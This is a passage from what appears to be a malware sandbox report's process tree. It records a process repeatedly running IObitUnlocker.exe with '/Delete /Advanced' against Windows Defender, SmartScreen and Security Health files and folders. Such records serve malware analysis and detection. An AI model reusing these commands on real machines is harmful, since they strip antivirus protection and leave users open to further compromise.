Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3152
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8712
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9096
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8292
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9144
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8372
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
